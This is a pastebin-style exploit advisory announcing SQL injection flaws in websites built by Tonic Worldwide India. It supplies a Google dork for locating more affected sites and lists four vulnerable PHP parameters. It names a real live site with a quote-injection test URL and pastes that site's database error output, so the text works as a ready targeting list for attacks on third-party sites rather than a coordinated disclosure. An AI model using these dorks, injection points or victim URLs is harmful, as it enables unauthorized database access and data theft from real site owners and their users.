KingSkrupellos

Made by Tonic Worldwide India SQL Injection

Apr 1st, 2019
62
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.64 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Made by Tonic Worldwide India SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 01/04/2019
  7. # Vendor Homepage : tonicworldwide.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:Made by : Tonic Worldwide
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  17.  
  18. ###################################################################
  19.  
  20. # Impact :
  21. ***********
  22. Made by Tonic Worldwide India is prone to an SQL-injection vulnerability because
  23.  
  24. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  25.  
  26. Exploiting this issue could allow an attacker to compromise the application, access or
  27.  
  28. modify data, or exploit latent vulnerabilities in the underlying database.
  29.  
  30. A remote attacker can send a specially crafted request to the vulnerable application and
  31.  
  32. execute arbitrary SQL commands in application`s database. Further exploitation of this
  33.  
  34. vulnerability may result in unauthorized data manipulation.
  35.  
  36. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  37.  
  38. ###################################################################
  39.  
  40. # SQL Injection Exploit :
  41. **********************
  42. /entertain-details.php?id=[SQL Injection]
  43.  
  44. /shop-brand-details.php?brand=[SQL Injection]
  45.  
  46. /shop-brands.php?category=[SQL Injection]
  47.  
  48. /dine-brand-details.php?dine=[SQL Injection]
  49.  
  50. ###################################################################
  51.  
  52. # Example Vulnerable Sites :
  53. *************************
  54. [+] esplanadeone.in/entertain-details.php?id=1%27
  55.  
  56. ###################################################################
  57.  
  58. # Example SQL Database Error :
  59. ****************************
  60. Warning: mysqli_num_rows() expects parameter 1 to be mysqli_result, boolean
  61. given in /home/esplanadeone/public_html/entertain-details.php on line 17
  62.  
  63. Warning: Cannot modify header information - headers already sent by
  64. (output started at /home/esplanadeone/public_html/entertain-details.php:17)
  65. in /home/esplanadeone/public_html/entertain-details.php on line 21
  66.  
  67. ###################################################################
  68.  
  69. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  70.  
  71. ###################################################################
Add Comment
Please, Sign In to add comment